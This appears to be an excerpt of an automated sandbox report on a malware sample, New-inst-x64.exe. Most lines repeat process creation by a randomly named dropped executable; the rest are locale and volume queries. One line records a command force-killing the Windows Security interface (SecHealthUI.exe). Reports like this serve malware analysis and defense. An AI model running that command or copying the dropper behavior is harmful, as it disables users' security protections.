      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM SecHealthUI.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,28_2_0046F048
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: EnumSystemLocalesW,28_2_0046B007
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: EnumSystemLocalesW,28_2_0046F299
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,28_2_0046F334
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: GetLocaleInfoW,28_2_0046F5E6
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: EnumSystemLocalesW,28_2_0046F587
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: EnumSystemLocalesW,28_2_0046F6BB
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: GetLocaleInfoW,28_2_0046F706
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,28_2_0046F7AD
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: GetLocaleInfoW,28_2_0046F8B3
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: GetLocaleInfoW,28_2_0046AB0C
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,29_2_0046F048
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: EnumSystemLocalesW,29_2_0046B007
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: GetLocaleInfoW,29_2_0046F8B3
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: EnumSystemLocalesW,29_2_0046F299
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: GetLocaleInfoW,29_2_0046AB0C
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,29_2_0046F334
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: GetLocaleInfoW,29_2_0046F5E6
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: EnumSystemLocalesW,29_2_0046F587
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: EnumSystemLocalesW,29_2_0046F6BB
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: GetLocaleInfoW,29_2_0046F706
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,29_2_0046F7AD
      Source: C:\Users\user\Desktop\New-inst-x64.exeQueries volume information: C:\Users\user\Desktop\New-inst-x64.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\xctyuuxnvcrcuez.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\xctyuuxnvcrcuez.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeQueries volume information: C:\Users\user\AppData\Local\mbtbiqwunmmmyby.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeQueries volume information: C:\Users\user\AppData\Local\mbtbiqwunmmmyby.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeQueries volume information: C:\Users\user\AppData\Local\ztrucvcctzwerxc.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeQueries volume information: C:\Users\user\AppData\Local\ztrucvcctzwerxc.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
